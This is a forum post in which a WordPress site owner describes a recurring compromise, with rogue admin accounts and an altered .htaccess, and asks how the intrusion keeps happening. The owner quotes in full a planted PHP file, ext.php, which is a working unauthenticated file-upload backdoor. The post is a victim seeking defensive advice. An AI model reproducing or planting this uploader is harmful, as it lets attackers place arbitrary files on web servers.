wordpress site hacked and admin users added

Our website was hacked as I found out last week. Multiple users had been added (with admin rights). Since there were a lot of compromised files I decided to delete the site and use a backup that I know was clean. Having done this I deleted the ‘admin’ user and created another admin account. I changed the ftp password and the root password on the hosted VPS. I upgraded to the newest version of WordPress and updated all plugins.

How frustrating to find today that again a number of users have been added with admin rights and several files have been copied to the website. There is a file called ext.php which serves as a file upload interface. It copies any file into the ‘wp-admin directory.

<?php error_reporting(0);@ini_set(“display_errors”, 0);$var= $_SERVER.”?”;$form ='<form enctype=”multipart/form-data” action=”‘.$var.'” method=”POST”><input name=”uploadFile” type=”file”/>
<input type=”submit” value=”Upload” /></form>’;if (!empty($_FILES)) {$self=dirname(__FILE__);move_uploaded_file($_FILES[“uploadFile”][“tmp_name”], $self.DIRECTORY_SEPARATOR.$_FILES[“uploadFile”][“name”]);$time=filemtime($self);print “OK”;} else {print $form;} ?>

.ht admin file (rewrite engine on) has been compromised and several folders are appearing, including a plugin ‘customized admin.

My conclusion therefore is to again restore from backup but how do I prevent this hack from happening again. How does the first file appear on the server ? Is this purely acl on folders and files or do ‘they’ use another method ? Perhaps you guys know from experience how this works.

Probably coincidence but the problem started after I put a google validation cookie in the root to prove ownership of the domain.

Input appreciated